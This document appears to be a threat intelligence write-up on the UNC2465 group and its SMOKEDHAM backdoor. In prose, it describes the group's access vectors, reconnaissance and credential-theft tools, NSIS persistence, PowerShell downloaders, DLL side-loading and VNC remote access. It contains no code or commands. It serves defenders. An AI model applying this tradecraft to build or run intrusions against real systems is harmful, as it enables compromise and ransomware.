Financially motivated threat actor UNC2465 has been utilizing the SMOKEDHAM backdoor to infiltrate target networks, with initial access often gained through phishing emails, trojanized software, or supply chain attacks. This group focuses on achieving persistence and lateral movement once inside the network, using various tools and techniques to carry out their malicious activities.
In the reconnaissance phase, UNC2465 leverages tools like Advanced IP Scanner and BloodHound to gather valuable information about the target network. For lateral movement, the threat actor employs RDP (Remote Desktop Protocol), while credential harvesting is carried out using Mimikatz. These tools enable the attacker to navigate through the network and escalate their privileges, furthering their goals.
Historically, UNC2465 has deployed DARKSIDE and LOCKBIT ransomware in their operations. However, recent campaigns suggest a shift towards using other ransomware families. The distribution of the SMOKEDHAM backdoor has been central to these operations, with malvertising and compromised software being common vectors for spreading the malware.
To establish persistence and download malicious files, the threat actor employs an NSIS script that performs several key functions. This script not only checks for specific file and registry values to avoid redundant execution but also creates folders, downloads archives, and extracts both legitimate and malicious tools. By modifying registry keys and configuring system services, the attacker ensures that the malicious payload runs on startup with elevated privileges.
A batch script leveraging PowerShell obfuscation is used to download and execute a malicious .NET payload from a C2 server, initiating communication with the attacker’s infrastructure. The kautix2aeX payload, written in .NET, communicates with the C2 server to receive commands and execute malicious actions on the infected system. This payload can conduct reconnaissance, take screenshots, upload/download files, and inject its code into memory for execution.
EV certificates are used by malicious actors to sign executables containing additional files, including malicious DLLs containing PowerShell commands. By employing legitimate binaries like oleview.exe for side-loading, the threat actor can evade detection while executing hidden scripts on the target system. Persistence is achieved through various mechanisms, including copying files, modifying registry entries, and querying external resources for diversion.
In one instance, the SMOKEDHAM actor used systeminfo and directory listing commands to gather system information and downloaded a PowerShell script via a Dropbox link. This script downloaded additional files, likely containing a modified winlogon.exe and a VNC configuration file, to establish a remote connection with a server controlled by the attacker. The use of UltraVNC over port 443 indicates the attacker’s desire for remote access and potential privilege escalation.
Overall, UNC2465’s operations showcase a sophisticated and persistent threat to organizations, highlighting the need for robust cybersecurity measures to defend against such adversaries. By understanding their tactics, techniques, and procedures, defenders can better safeguard their networks and mitigate the risks posed by financially motivated threat actors like UNC2465.